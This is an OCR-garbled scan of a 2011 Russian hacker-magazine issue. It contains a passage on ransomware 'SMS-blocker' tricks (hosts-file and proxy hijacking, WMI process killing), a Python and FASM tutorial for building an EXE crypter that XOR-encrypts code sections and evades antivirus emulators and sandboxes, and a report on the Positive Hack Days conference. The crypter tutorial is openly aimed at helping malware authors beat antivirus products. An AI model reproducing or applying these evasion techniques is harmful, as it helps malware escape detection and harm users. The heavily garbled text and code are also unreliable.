Например, малварь может обрабатывать ѴѴМ_М01ІЗЕІ_ЕАѴЕ и, в 
случае, если курсор мыши покидает клиентскую часть окна, воз- 
вращать его обратно. Чем сообразительней программист, тем 
больше всяких трюков он может придумать. 

Но одним только вездесущим окном дело обычно не ограни- 
чивается. Встречаются, например, экземпляры, которые меня- 
ют обои на рабочем столе. Обычно таким трюком пользуются 
антивирусы-подделки. На десктопе появляется что-то типа 
значка химического оружия и грозная надпись, а при клике по 
пустому пространству экрана открывается интернет-страница с 
предложением купить «полезное» ПО. Делается это довольно 
просто, никаких велосипедов изобретать не надо — в ѴѴіпсІоѵѵз 
есть забытая всеми возможность выводить на рабочий стол 
определенную веб-страницу — со всеми вытекающими из этого 
последствиями. 

Мошенники могут модифицировать ярлыки на рабочем столе 
или в главном меню ОС. Детская шалость, когда в стандартном 
ярлыке к Косынке указывается путь к Саперу, может успешно 
применяться для запугивания пользователя. Если доверчивый 
юзер запускает свой любимый браузер, а вместо него появля- 
ется сообщение о том, что надо бы отправить СМС на короткий 
номер, то этот самый юзер начнет сильно нервничать, и велика 
вероятность того, что СМС все-таки уйдет по адресу. Кстати, 
если подправить збогісиіз в папках автозагрузки, то можно 
довольно эффективно скрыть авторан даже от продвинутых ком- 
пьютерщиков. 

Используются и более изысканные способы. Например, интер- 
фейсы ѴѴМІ позволяют приложениям получать извещения о 
запускаемых процессах (да и вообще много всякой другой 



инфы). Малварь может мониторить с помощью ѴѴМІ список про- 
цессов, запущенных в системе, и при запуске нового приложе- 
ния выполнять определенные действия, например, закрывать 
вновь созданный процесс и показывать сообщение с радост- 
ным призывом заплатить и спать спокойно. Очень часто можно 
столкнуться с тем, что интернет-браузер отказывается отобра- 
жать некоторые части всемирной паутины, например, сайты 
антивирусных компаний или поисковики. Несложно догадаться, 
что это сделано для того, чтобы жертва как можно дольше 
испытывала на себе действие зловреда. 

Сделать подобную пакость можно кучей разных способов. 
Самым распространенным приемом является модификация 
файла Ьобіб, который находится тут %5у5'ЬетКоо1:%\5у5{:ет32\ 
сІгіѵег 5 \е{:с\. Этот файл содержит базу данных доменных 
имен и используется при их трансляции в сетевые адреса 
узлов. Проще говоря, если написать там уапбех.ги и через про- 
бел ір-адрес гугла, то мы будем попадать на гугл, вводя адрес 
яндекса. Но фишка с Ьобіб настолько избита, что о нем знают 
даже первоклассники, а у малвари может оказаться недоста- 
точно прав для его редактирования. Поэтому следующий по 
популярности прием — это использование прокси. В настрой- 
ках браузера прописывается ір сервера, на котором крутится 
какой-нибудь ЭциісІ, который, в свою очередь, заменяет неугод- 
ные страницы чем-нибудь более полезным для мошенников. 
Достучаться до ІЕ можно через его СОМ-интерфейсы, а к другим 
браузерам нужен индивидуальный подход. 

Поддельные 0145-сервера тоже неплохо справляются с зада- 
чей подмены сайтов. Правда, для этого нужны не только права 
админа в системе, но и рабочий 0145-сервер. Утилита пеізб 
позволяет легко и просто изменить настройки подключения к 
Сети, но тру-кодеры воспользуются программными методами, 
например, все тем же ѴѴМІ. Сделать недоступными некоторые 
серверы в интернете можно, создав специальную запись в гоиіе 
ІаЫе. Люди могут сделать это с помощью команды гоиіе, а про- 
граммы юзают специальную АРІ — СгеаІеІрЕогѵѵагсІЕпІгу. Но в 
этом случае надо точно знать все ір-адреса ресурса, который 
нужно сделать недоступным. Зачастую это практически невоз- 
можно (в случае с крупными сайтами типа яндекса, гугла и про- 
чих), поэтому путем модификации роутинга зло-кодеры очень 
часто просто отрубают интернет пользователю, не заморачи- 
ваясь с выборочной блокировкой. С помощью Ьобіб и прокси 
можно даже организовать простенький фишинг, подменяя ори- 
гинальные страницы на очень похожие. Как вариант — просто 
выводить большими красными буквами сообщение «Отправьте 
СМС». Разумеется, подменять страницы можно не только на 
стороне сервера, но и локально, используя всеми любимые рас- 
ширения к браузерам. Например, в ІЕ — это широко известные 
ВНО. Незаметно установив такое расширение, можно гибко 
управлять содержимым отображаемой веб-страницы. Например, 
фрауд-антивирусы могут заменять «плохие» для сеццбя ссылки 
в выдаче поисковиков, так как обычно, если ввести название 
подобного ПО в гугле, то первый линк будет на инструкцию о 
том, как от этого ПО избавиться. 

Заключение 

В этой статье мы привели далеко не полный список трюков 
и хитростей, которые используют современные зловреды- 
мошенники. Кодеры, перешедшие на темную сторону, постоянно 
придумывают новые уловки и методы воздействия на законо- 
послушных пользователей Сети. Но имея хотя бы небольшое 
представление о том, что и как делает пресловутый СМС- 
блокер, можно уже бороться с ним. А чтобы эта борьба была как 
можно менее болезненной, очень советую всем помимо крутых 
антивирусов использовать учетную запись с урезанными права- 
ми, так как в Линуксе и МакОси вирусов нет именно потому, что 
там не сидят под рутом. т 
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НУ. АНТИВИРУС, 
ПОГОДИ! 

Создаем ЕХЕ-криптор на РуІНоп’е 

ѳѴѴеЬ мы спасли от антивирусов несколько месяцев назад. Зто было 
нетрудно - область относительно новая, не освоенная. 

С исполнимыми же файлами антивирусы борются уже 
десятилетиями. Побороть ЕХЕ-модуль будет сложнее, но... мы 
справимся :). 



Выпуск 1. Ознакомительный 

Ты уже знаешь, что я считаю антивирусы абсолютно бесполезными — 
хотя бы по той причине, что они помогают только от самых примитив- 
ных зверьков, которые в условиях современного денежного малварь- 
бизнеса встречаются не так часто. Современные злокодеры, подогре- 



тые денежными вливаниями, научились программировать довольно 
жестко, но есть у них одна маленькая проблема — криптовка — доста- 
точно сложная штука, для написания которой нужны глубокие знания 
РЕ-формата, ассемблера и системного программирования. Из-за 
высокого «входного барьера» в этой области мало профессионалов. 
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Код первой секции в ОІІу. На картинке видим, что оригинальный код не распознался ОІІу, 
поскольку был заХОРен 



И найти хорошего криптора ой как сложно. 

Но решение проблемы есть! Как мы знаем, антивирус- 
ные компании обмениваются технической информаци- 
ей и создают специальные ресурсы, посредством кото- 
рых мы сами отсылаем им сэмплы (типа ѴігизТоІаГа). 

Но ведь и вирмейкеры тоже могут обмениваться 
информацией! Необязательно палить приватные мазы 

— публичные технологии тоже сгодятся. Например, 
было бы круто, если бы в каком-то одном месте лежали 
функции для генерации РЕ-файла, генерации импорта, 
шифрования ресурсов, рабочие функции определения 
ЗапсІВох’ов, тогда мы могли бы создавать крипторы 
также непринужденно, как домики из кубиков Лего. 
Идеальным местом для обмена, наверное, будет 
ОііНиЬ, и туда я залью исходники написанного нами 
сегодня криптора — он будет доступен по адресу Ыір:// 
дііЬиЬ.сот/ргезісІепІиа/ЕхеРаскег . 

Кроме того, в решении проблемы здорово помогло бы 
использование высокоуровневых языков программиро- 
вания. В паблике сейчас валяются исходники крипто- 
ров на С++ или ѴізиаІВазіс’е, но ведь от этого проще не 
становится, поскольку разобраться в написанном коде 

— ой как непросто. На Руібоп’е все выглядит в разы 
лучше, поэтому именно его мы сегодня и будем исполь- 
зовать. В общем, заложим фундамент этой благородной 
миссии. Присоединяйся! 

Выпуск 2. РЕ-файл 

Структура РЕ-файла довольно сложная, поэтому под- 
робная документация будет ждать тебя на диске, а 
здесь я представлю твоему вниманию лишь избранные 
моменты. 

РЕ-файл представляет набор разных служебных струк- 
тур, связанных между собой, и набор данных, которые 
размещены в секторах. Загрузчик ѴѴіпсІ оѵѵз’а читает 
структуры, обрабатывает их (например, импортирует 
Ои_'ки) и потом передает управление на инструкцию, 
указанную в поле «Епігу Роіпі». 

Теперь посмотрим, что же нужно нам сделать, чтобы 
изменить файл и при этом не испортить его. 

Выпуск 3. Теоретический 
криптор 

Для начала выберем файл, который будет у нас испол- 
нять функции лабораторной мыши. Чтобы сделать при- 



Как работает реШе 

При загрузке в ребііе экзэхи, библиотека сохраняет 

сам файл в ре. сіаіа , а потом обрабатываетего и 

создает массив структур ре. зітисішгез . Струк- 

тура — это объект, у которого есть адрес. Адрес, по 
которому она находится в файле, и есть набор полей. 
При сохранении файла ре.\л/гДе(б1епаппе=»ге5и11:. 
ехе»] либа проходит по всем структурам и сохраняет 
их по указанным адресам. 

Чтобы что-то добавить, например, в ту же секцию, 
нам сначала нужно найти адрес в памяти. Это можно 
посчитать так: адрес в памяти последней секции 
+ размер секции. Дальше заполняем все поля в 

структуре и добавляем ее в массив ре. зІгисШгез 

Вот и все :]. 




ятное Андрюшку :), мы, пожалуй, будем издеваться над 
РиНу.ехе. Упрощенно его структура будет выглядеть так: 

1. Служебные данные 

2. Первая кодовая секция 

3. Другие секции с данными 

Алгоритм криптора следующий. Создать две ассем- 
блерные программы. Первая будет косить под обычную 
прогу и проверять, что мы не в эмуляторе, а потом 
передаст управление на вторую программу. Вторая же 
восстановит оригинальную структуру файла и передаст 
управление на оригинальную точку входа РиНу. И запи- 
сать эти программы в файл. 

В результате получится следующая структура: 

1. Служебные данные 

2. Первая кодовая секция 

2.1. Наша первая программа, которая 
передаст управление на 4.2 

2.2. Шифрованный код первой секции 

3. Другие секции с данными 

4. Добавленная секция 

4.1. Часть кодовой секции, 
перезаписанной программой 2.1 

4.2. Вторая программа, которая оригиналь- 
ный код из 4.1 поместит на 2.1, а 
потом расшифрует кодовую секцию и 
передаст на нее управление. 




| НТТР://ѴѴѴѴѴѴ 

V г 

> Ііпкз 

• Репозиторий с из- 
мененным ребіе’ом и 
написанным криптом 
ЬЦрѴ/діШиЬ.сопп/ 
ргезісІепІиа/ЕхеРаске г 

• Оригинальная либа 
ребііе ЬЦрУ/сосІе. 

д о о д Іе . со т/ р/ре і і Іе/ 

• Дока по ТогпасІоѴѴеЬ- 
шаблонизатору 
ЬЦрѴ/ѵѵѵѵѵѵЧогпасІ- 
оѵѵеЬ.огд/ 

• Тулза для анализа 
РЕ-файла, из которой 
можно брать много по- 
лезных функций 
ЬЦрѴ/сосІе.доодІе. 




> СІѴСІ 

• На нашем диске 



найдешь исходники 
криптора и очень 
полезныедоки какпо 
самому формату РЕ- 
файла, таки потеории 
криптования. 

• На диске тебя ждет 
видео, в котором мы 
тестируем описанный 
в статье криптор 




Хочешьузнать боль- 
ше? Для любителей 
Рубіоп есть хорошая 
книга — «Сгау На! 
РуіНоп». 




> ѵѵагпіпд 

Помни, что информа- 
ция в статье представ- 
лена исключительно 
в образовательных це- 
лях. Веди себя хорошо 
и не думай, что мы тебя 
к чему-нибудь этакому 
подстрекаем :). 
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Выпуск 4. Практический криптор 

Ну наконец-то мы добрались до сердца нашей статьи. Для рабо- 
ты криптора нам понадобится модуль ребііе (будем использовать 
несколько модифицированную версию), и с помощью либы откро- 
ем РиПу: 

ітрогі: ребіе 

ре = ребІе.РЕС'риІ^у.ехе" ) 

Теперь, если ты напишешь «ргіпі ре», то увидишь подробную инфу 
обо всех характеристиках файла, по этой инфе я советую искать 
нужные для изменения поля в файле. А о внутренней работе моду- 
ля обязательно прочитай во врезке. 

Теперь немного математики. У нас будут две программы, которые 
нужно внедрить в файл. Они будут занимать где-то по 512 байт 
каждая максимум. Поэтому для размещения добавим новую сек- 
цию в 1024 килобайт вызовом: 

ре . асІсІ_1а5І:_5ес1:іоп ( 5І2е=1Ѳ24) 

Закриптуем первую секцию ХОР’ом с ключом «1»: 



ет все инструкции процессора. Сейчасже ситуация изменилась, 
и самые эффективные приемы основаны на использовании 
ѴѴі псіо\л/5 АРІ. Согласись, что антивирус вряд ли сможет эмулиро- 
вать все АРІ. 

Воттебе такая идейка для реализации: 

• создаем ѴѴіпсІоѵѵз-приложение и один дополнительный поток; 

• после создания потока он должен послать через АРІ сообщение 
основному потоку с каким-то КЛЮЧОМ; 

• в главной программе проверяем, и если ключ правильный — 
передаем управление на код расшифровки основного файла; 

• если код неправильный, то просто ничего неделаем и находим- 
ся в вечном цикле получения сообщений отѴѴіпсіоѵѵз. 

РБ: Никогда не останавливай программу с ошибкой, это лишь 
прибавит крипторулишний вес. Вечный цикл получения сообще- 
ний от ѴѴіпсІоѵѵз — лучший способ. 



вой программы. Конечно же, писать мы ее будем на ассемблере, 
используя РА8М для компиляции. Создадим файлик раск.ірі.азт с 
содержанием: 



ре. зес1:іоп5[0] .хог_сІа1:а(сосІе=1) 

Магия, правда? :). А теперь прикинь, что все это пришлось бы 
писать на С++! 

Поскольку в начале программы будет наш код, то сохраним ориги- 
нальный код, скопировав его в последнюю секцию. Адрес первой 
секции в файле находится в переменной — ре. зес1:іоп5[0] . 
РоігѵбегТоКаі\Юа1:а, а последней, соответственно — в 

ре . зесЬіопз [ -1] . РоігѵбегТоКаиЮаІіа: 

ре.сІа1:а_сору(ре. 5ес1:іоп5[0] . РоіпѣегТоКаыОаІіа , 
ре. зес1:іоп5[-1] . Роіп1:егТоКаѵ\/Оа1:а, 512) 

Оригинальный код сохранен, и мы приступим к написанию пер- 



изе32 

тоѵ еах, {{ §о }} 

З'тр еах 

Ты, наверное, уже догадался, что это не готовый исходник, это 
лишь шаблон для шаблонизатора из ТогпасІоѴѴеЬ, а его мы уже 
отлично знаем, ведь именно его мы использовали при написании 
НТМІ_-морфера. Сгенерируем первую программу: 

азт = ТетрІаІіеСорепС'раск.ТрІ.азт'П "г" ) . геасІ( ) ) . §епега1:е( 
§о=ре.ОРТІОІ\ІАІ__НЕАОЕК. Іта§еВазе + 
ре. зес1:іоп5[ -1] .Ѵіг1:иа1АсІсІге5 5+512, 

) 

ыііііі ореп("раск. азт", "м") аз Т: 

Т.ыгі1:е(а5т) 
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Структура РЕ-файла 



об . 5у5І:ет( г" с : \-Ра5тіл/\РА5М. ЕХЕ раск . авт" ) 

В переменной до мы передаем адрес в памяти, где будет наша 
вторая программа — то есть, в последней секции, начиная с 512 
байта. А в последней строчке компилим результат на РАЗМ’е. 
Теперь запишем получившийся код в начало первой секции: 

пем_раск = ореп("раск.Ьіп'Ч м гЬ" ) .геасІ() 
ре.сІа1:а_гер1асе(о-р-р5е1:=ре. зес1:іоп5[0] . Роіп1:егТоКаыОа1:а , 
п еы_сІ а* а = п еы_ра с к ) 

Вторую программу запишем в файл соруТрІ.азт. Размер у нее 
более внушительный, поэтому полный код смотри на диске. Там 
содержится два цикла, один скопирует 512 байт оригинальной про- 
граммы с последней секции в первую, а второй цикл расшифрует 
всю первую секцию. После этого передается управление на ориги- 
нальную программу. 

При компиляции темплейта нужно передать туда параметры для 
циклов копирования и расшифровки: 

со РУ_Ргот = ре.ОРТ]ШАІ__НЕАОЕК Лта§еВаве+ре. весіііопв [-1] . \ 
ѴігІшаІАсІсІгевв 

сору-ѣо = ре.ОРТ]ШАІ__НЕАОЕК Лта§еВаве+ре . вес1:іоп5[0] . \ 
ѴііЛиаІАсІсІгевв 

оер = ре . ОРТІОМАІ__НЕАОЕК . Іта§еВаве+ре . ОРТІОМАІ__НЕАОЕК . \ 
АсІсІгеввО-РЕпІігуРоіпІ: 



Желательный функционал 



Обход песочниц 



В крипторе нужно делать проверки на запуск в виртуальной 
машине, ЗапсІВох’е или анализаторетипа анубиса. Чтобы ихзе- 
детектить, нужно провести небольшое исследование и написать 
программу, которая будет на экран выводить разные внутренние 
параметры системы, а дальше — проверить этот файл на том же 
анубисе и в скриншоте посмотреть параметры, которые показала 
наша прога. Дальше все просто — при запуске на системе с по- 
добными параметрами — просто уходим в цикл. 



Обязательный функционал 2. 



Шифрование ресурсов и импорта 



Для шифрования ресурсов мы должны пройтись по секции ре- 
сурсов и сохранить оттуда важные для запуска файла — иконки и 
манифест. Дальше создаем новые ресурсы с важными ресурсами, 
а остальное шифруем. После запуска криптора восстанавливаем 
все обратно. 

Несколько сложнее получается с импортом, ведь его также нужно 
сначала зашифровать, потом сгенерироватьлиповый импорт, 
но после восстановления импортеще нужно вручную проини- 
циализировать.то есть — загрузить ОЦ_’ки и сохранить втаблицу 
импорта реальные указатели на функции. 



авт = Тетр1а1:е(ореп( ,, сору.1:р1.а5т , Ч "г") . геасІ()) .§епега1:е( 
с ору_-Ргот= с °ру_-Ргоггц 
сору_1:о=сору_1:о, 
сору_1еп=512^ 

хог_1еп=ре. весіііопв [0] .Мівс_Ѵіг1:иа15І2е, 

кеу_епсосІе=1 л 

огі§іпа1_оер=оер., 

) 

Остался маленький штришок — записать вторую прогу в файл и сде- 
лать первую секцию записываемой, чтобы расшифровщик не выдавал 
ошибок, а также установить точку входа на начало первой секции: 

пем_сору = орепО'сору.Ьіп'Ч "гЬ") .геасД) 
ре. сІа1:а_гер1асе(о-р-р5е1:=ре. весіііопв [-1] .\ 
РоіпіегТоКамОаІіа+512., пем_с1а1:а=пем_сору) 



ре. весіііопв [0] .Сбагасііегівііісв | = 

реіііе . 5ЕСТІ0І\І_СНАВАСТЕКІ5ТІС5 [ " ІМАСЕ_5СМ_МЕМ_ІлІКІТЕ " ] 
ре . ОРТІОМАІ__НЕАОЕК . АсІсІгеввО-РЕпІігуРоіпІ: = 
ре.вес1ііоп5[0] .ѴігІіиаІАсІсІгевв 
ре.ыпі1:е(1і1епате= ,, ге5и11:. ехе" ) 

Выпуск 5. Завершающий 

Если собрать кусочки кода вместе, то будет у нас всего 50 строк. 
Всего лишь 50 — и криптор готов! 

А теперь прикинь, сколько строк содержала бы программа на С? 
Конечно, это еще далеко не готовый продукт, над ним нужно рабо- 
тать и работать. Чтобы довести систему до реального криптора, 
нужно добавить как минимум шифрование ресурсов и импорта, а 
также антиэмуляцию. 0 том как теоретически эти проблемы решить, 
смотри во врезках. Удачи! т 
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РОЗІТІѴЕ 

НАСКОАУ32011 

Отчет с международного форума по практической 
безопасности 



о 19 мая прошло важное для российской индустрии ИБ мероприятие 
- международный форум Розіііѵе Наск Бауз 2011, организованный, 
как легко догадаться, компанией Розіііѵе ТесНпоІодіез. Инсайдеры 
нашего журнала не упустили возможность проследить за результата- 
ми этого ивента и спешат поделиться с тобой впечатлениями. 



Первое упоминание о подготовке к РНО201 1 вскользь появилось в 
твиттере Дмитрия Евтеева (Шеѵіееѵ) - эксперта по информационной 
безопасности РТ и автора нашего журнала. Буквально за несколь- 
ко недель до этого Дима абстрактно упоминал об идее подготовки 
события, которое должно было приблизить нашу индустрию инфор- 
мационной безопасности поближе к мировой арене. 

В конце марта появляется официальный сайт рЬбауз.сопп . который 
приоткрывает завесу тайны над происходящим в застенках компа- 
нии процессом. Дерзкая миссия «объединить хакеров и компании 
И Б- индустрии, чтобы они смогли понять, насколько они нужны друг 



другу» и постоянно обновляющиеся списки участников, среди кото- 
рых представители США и Европы, начинает строить приблизитель- 
ную картину в сознании стороннего наблюдающего: «Позитивные 
технологии» замахнулись на то, чтобы провести конференцию, похо- 
жую по уровню если не на Оеіюоп и ВІаскНаІ, то, по крайней мере, 
на НІТВ. 

Атмосфера 

Оказавшись на ресепшен клуба, где проходил ивент, сразу замеча- 
ешь масштаб конференции: просторные залы и помещения, плавно 
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Участники конкурса Саріиге іНе Лад из Индии 

переходящие друг в друга, в плане оформления слегка 
отдают киберпанковской атмосферой. Кругом дисплеи 
и всевозможные гаджеты, на репите крутящие ролик 
РНБ201 1 , легкое техно, играющее в фоновом режиме. 
Однако, несмотря на размеры площади, понимаешь, 
почему Форум носит закрытый характер. Людям на том 
или ином докладе зачастую не хватало сидячих мест, а 
иногда и вовсе приходилось стоять на входе в помеще- 
ние. 

Программа Форума состояла из нескольких параллель- 
ных секций: 

1. мастер-классы; 

2. бизнес-семинары; 

3. технические семинары; 

4 . конкурсная программа. 

Для меня наибольший интерес представляли первые три 
секции, поэтому приходилось разрываться между докла- 
дами. Помог заранее составленный план, в котором я 
для себя выделил несколько наиболее актуальных (на 
мой взгляд) направлений в индустрии. 

В перерывах между презентациями выступающих было 
интересно посмотреть на обновляющиеся в реальном 
времени результаты СТР. Команды из Европы, США и 
Китая «бились за монолит» (подробнее ознакомиться с 
легендой соревнования можно в блоге РТ: ЬіТІѵ/ЦВОіп ) 
или, как интерпретировал этот конкурс представитель 
средств массовой информации в лице одного из новост- 
ных телеканалов, «пытались украсть информацию про- 
тивника, и в то же время — защищали свою». В переры- 
вах между программой докладов, казалось бы, в режиме 
щзі 4 Рип проходили конкурсы «Взломай за 900 секунд», 
«іРЬопе: взломай и уноси», «Ноутбук: взломай и уноси», 
однако методы и средства взлома подопытных девайсов 
в силу своей уникальности (чего только стоит 0-бау под 
Забагі, продемонстрированный впервые в рамках кон- 



курса) также не оставили СМИ без внимания. 
Неформальная обстановка, в которой находились участ- 
ники, как показывает опыт аналогичных международных 
конференций, отлично способствует обмену информа- 
цией, идеями, визитками. Здесь без всякого официоза 
можно пообщаться с сотрудниками любого ранга. За 
исключением высокопоставленных должностных лиц 
компании Розіііѵе Тесбпоіодіез — темп, в котором им 
приходилось перемещаться и действовать во благо кон- 
ференции, заслуживает уважения и является примером 
«позитивной энергии». 

Доклады 

Доклад — это, пожалуй, основной вид подачи информа- 
ции на РЕЮ2011. Даже некоторые (те, на которых я при- 
сутствовал) мастер-классы практически не отличались 
по своей форме от семинаров. Темы, которые поднима- 
лись в рамках мероприятия, не являлись чем-то прин- 
ципиально новым или инновационным, а скорее пред- 
ставляли аккумулированную информацию (иногда уже 
опубликованную в ранних работах) и структурированно 
поданную слушателю. 

Моей отправной точкой стал бизнес-семинар на тему 
«Безопасность в облаках». Интересно сформулиро- 
ванный топик обещал поведать о тонкостях безопас- 
ности, касающейся облачных технологий. Направление 
перспективное и, в силу относительной «свежести» в 
ИБ-индустрии, представляет собой непаханное поле для 
инновационных идей. 

Доклады, относящиеся к облачным технологиям, поми- 
мо «вкусного», с позиции бизнеса, описания предмета 
изложения содержали общую мысль: инсайд — главная 
угроза безопасности облачной инфраструктуры, а утечка 
через ее администратора — это самый дорогостоящий 
риск. Каждый третий слайд утверждал и подтверждал 




> СІѴСІ 

На диске тебя ждет 
пример одного изза- 
даний конкурса СТР. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• Фотографии, видео и 
доклады с мероприя- 
тия можно изучить на 
официальном сайте 
РНБ: Фсіаѵз.ги . 

• БлогДмитрия 
Евтеева: 

беѵІееѵ.ЫодзроТсот . 

• Сайт компании 
Розібѵе Тесбпоіодіез: 

рфесигііу.ги . 
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Доклады на РИО не страдали от недостатка внимания 



данные факты. Зарубежный специалист, директор РѵѵС Кристофер 
Гоулд, сформулировал причину отставания наших «облаков» от 
зарубежных: костью в горле внедрения облачной инфраструкту- 
ры в бизнес-процессы является ФЗ-152 (Федеральный закон «О 
персональных данных»). Теоретические абстракции, характерные 
для бизнес-презентаций, разбавил Сергей Гордейчик докладом на 
тему использования облака типа ІааЗ (Іпітазіхисіиге аз а Зегѵісе) 
в тестах на проникновения. Были озвучены интересные варианты 
с наглядными примерами, в которых все расчеты берет на себя 
облако. 

Непривычно спуститься с облаков под землю, зарывшись с голо- 
вой в структуру )ред-формата, на техсеминаре Дмитрия Склярова, 
тема которого сформулирована следующим образом: «Уязвимости 
систем контроля подлинности цифровых фотографических при- 
ложений». Здесь интересно было узнать, как действовал ресерчер 
в процессе поиска уязвимостей, какие методы и средства исполь- 
зовал. А методы, кстати говоря, экзотические и иногда становится 
непонятно, как парни приходят к умозаключениям, преобразуя их 
в конечный результат. Например, меня поразила схема девайса, 
который «вымигивает» с помощью светодиода содержимое памяти 
фотоаппарата... 

Своеобразным отдыхом от исходных кодов и реализуемых ими 
криптопреобразований стал доклад Александра Гостева, ведущего 
антивирусного эксперта «Лаборатории Касперского», о развитии 
киберпреступности. Коллекция примеров крупнейших в истории 
хакерских атак, исчерпывающие факты об инциденте с Айроном 
Барном и группировкой «хактивистов» ТЬе Апопутоиз искушали 
бизнесовую аудиторию. Смирно дослушав информацию, которая 
собрана из открытых источников и подана в стиле свойственном 
трейлерам крупных блокбастеров, я перешел в секцию мастер- 
классов, а именно в Фгепзіс-сектор, где Максим Суханов, предста- 
витель Огоир-ІВ, демонстрировал результаты реальных экспертиз, 
которые доводилось проводить компании. 

Центральной темой Форума была кибервойна, поэтому с моей сто- 



роны было непозволительно пропускать доклады, которые содер- 
жали данный термин в своих заголовках, к тому же не хотелось 
пропустить выступление директора РТ Юрия Максимова и просле- 
дить за его подачей. «Кибервойна. Мы их или они нас?» — топик, 
оставленный организаторами на закуску и отданный на растерза- 
ние представителям бизнес-семинаров. 

«Война» в привычном понимании этого термина, как конфликт 
двух сторон с элементами вооруженной борьбы, уже отходит на 
второй план. Поле боя переносится в кибер-пространство, тактика 
и стратегия здесь имеют свою специфику. Таким образом, США 
уже давно отказались от понятия «цели», как объекта физического 
мира, а заменили ее понятием «боевая платформа» для ведения 
боевых действий в определенной среде. Стратегические и такти- 
ческие операции строятся на так называемых «расчетах эффек- 
тов». Победить в информационной войне может тот, кто умеет 
рассчитывать эффекты большего порядка. Например, рассмотрим 
такое диверсионное действие, как взрыв моста. Его уничтожение 
способно поразить транспортную систему противника и тем самым 
осложнить процесс его перемещения в ходе военных действий. Это 
первый порядок. Мост — стратегический объект, который требуется 
оппоненту для транспортировки оружия и боеприпасов. Его устра- 
нение значительно усложнит задачу транспортировки — это эффект 
второго порядка. Если во время взрыва по этому мосту будет про- 
езжать командир роты, который вследствие расчета психологиче- 
ского портрета имеет все предпосылки стать командиром дивизии, 
то его устранение во время взрыва уже будет являться эффектом 
третьего порядка. Вот так вот на основе расчета эффектов строятся 
военные действия на информационном поле. Фактически, хакеры 
— это теперь не только компьютерные специалисты, в привычном 
понимании данного определения, но и психологи, которые способ- 
ны рассчитывать перспективу развития боевых действий. 

Однако тема топика содержала в себе, на мой взгляд, не ритори- 
ческий вопрос «Мы их или они нас?». Как оказалась, конкретный 
ответ на него содержали не сами доклады, а результат соревнова- 
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Судя по крутым очкам, у чувака большой потенциал 




Никита Тараканов демонстрирует свежий Обау в своем 
мастер-классе 



ния СТР: его выиграла команда РРР из США. В общем, в этот раз 
получилось так, что «они нас» :). 

За кулисами 

В очередной раз у меня появляется возможность задать вопросы 
одному из непосредственных организаторов РРЮ201 1 , гуру СТР’ов 
и НаскОиезКов, эксперту по информационной безопасности компа- 
нии Розіііѵе Тесбпоіодіез — Дмитрию Евтееву. 

Денис Макрушин [М] Расскажи, как родилась легенда СТР? Где черпали 
вдохновение в процессе подготовки сценария? 

Дмитрий Евтеев [Е]: Легенда полностью придумана Сергеем Г ордейчи- 
ком (технический директор РТ — прим, ред.), потому что придумывать 
такие сценарии, подобные полноценным книжным сюжетам, у нас мало 
кто способен. Разработчики вносили свои корректировки. 

[М]: Асколько людей участвовали в разработке СТР и сколько времени на 
это потрачено? 

[Е]: Приблизительно треть компании принимало участие в разработке. У 
нас сейчас работает порядка 1 50 человек, поэтому 50 человек около двух 
месяцев готовили конкурс. 

[М]: В качестве темы РРШ 201 1 в общем и соревнований в частности 
выбрана кибервойна. Почему именно ее выбрали в качестве основного 
объекта исследования? 

[Е]: На первоначальной стадии у нас была совершенно другая идея и, 
соответственно, вытекающая из нее тема конкурсов, которую, кстати 
говоря, мы сейчас прорабатываем и в которой планируем задействовать 
не только зону СТР, но и тех участников конференции, которые находятся 
в зоне семинаров и слушают доклады. 

[М]: Какой «выхлоп» ожидался оторганизации данного мероприятия: 
рейтинг, косвенный или прямой финансовый поток? 

[Е]: Мы организовали мероприятие, результат которого далеко перева- 
лил за уровень наших ожиданий, представляющих собой исключительно 
энтузиазм. Форум готовился фз!: 4 Тип, и побочные результаты (в виде 




і-оск ріскіпд — модное в ИБ-среде увлечение, связан- 
ное со взломом хардварных замков. Ни одна крупная 
конфа не проходит без парней с набором отмычек. 



поднятия рейтинга) также не прогнозировались. 

[М]: В заключительной части бизнес-семинаров натему«Кибервойна. Мы 
их или они нас?» ведущим был заявлен Юрий Максимов. Лично я ждал его 
выступление, так как было интересно, что же скажет генеральный дирек- 
тор компании РТ, и я хотел понаблюдать за его подачей материала. Однако 
он не появился, и Сергей Гордейчи к выполнял роль генерального спикера. 
С чем это связано? 

[Е] : Юрий просто был занят в этот день. Честно говоря, мало кто ожидал, 
что маленькая компания способна на подготовку мероприятия такого 
формата и такого уровня. Включая директора. 

[М]: Пожалуй, конкурс СТР дал ответ на вопрос «Мы их или они нас?». Как 
ты прокомментируешь победу команды из США? 

[Е] : Ребята из РРР просто с самого начала выбрали правильную страте- 
гию: не отвлекались на дополнительные задания, в отличие от остальных 
команд, которые в погоне за бонусами просто теряли из фокуса основ- 
ную задачу. 

[М]: НазваниеФорума подразумевает несколько позитивныхдней 
(Розіііѵе Наск Рауз). Что нам стоитждать в будущем году? Или может быть 
позитивные дни будут распределены в течение года? 

[Е] : Мы уже сейчас начинаем подготовку к РЕЮ 201 2 и рассчитываем на 
программу нескольких дней в режиме «поп-зіор». 

Выход из темноты 

Конференция Розіііѵе Наск Оауз несомненно обеспечила инду- 
стрию инфобеза стимулом для дальнейшего развития в различ- 
ных векторах: организация мероприятий, участие в конкурсах по 
практической безопасности, увеличение качества и количества 
докладов, поиск уязвимостей в продуктах. Странно, мы смотрим за 
рубеж, как в окно смотрит заключенный периметра четырех стен, 
и восхищаемся уровнем забугорных конференций. «Позитивные» 
сделали попытку выбраться за этот периметр. Только выходя из 
зоны своего комфорта, мы приобретаем ценный опыт, □с 
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I Мария «МіГгіІІ» Нефедова (ті^гііігагеаі. хакер. ш) 



К? 

ЧЕМПИОНАТЫ 
ПО ПРОГРАММИРОВАНИЮ 
И НЕТОЛЬКО 

Ломать, программировать и получать деньги? 
Легко! 



о Рассказывая о конференциях, форумах, съездах и лан-пати, 
нельзя обделить вниманием хакерские и программерские 
чемпионаты и контесты. А ведь их немало, за призовые места там 
платят неплохие деньги, да и в целом участие в подобных 
мероприятиях - это очень полезный опыт. 



АСМ ІСРС 

Когда: 

Регистрация команд заканчивается в сентябре 
Четвертьфинал проходит в октябре 
Полуфинал в ноябре 
Финал в январе— марте 

Где: 

Каждый год финал проходит в разных странах 

Сайт: 

спп.ЬаѵІог.есІи/ѵѵеІсоппе.ісрс 

Наш список открывает Международная студенческая олимпиада по 
программированию (в английском принято сокращение АСМ/ІСРС 
или просто ІСРС) — крупнейшая студенческая командная олимпиа- 
да по программированию в мире. О данном ивенте мы уже писали 
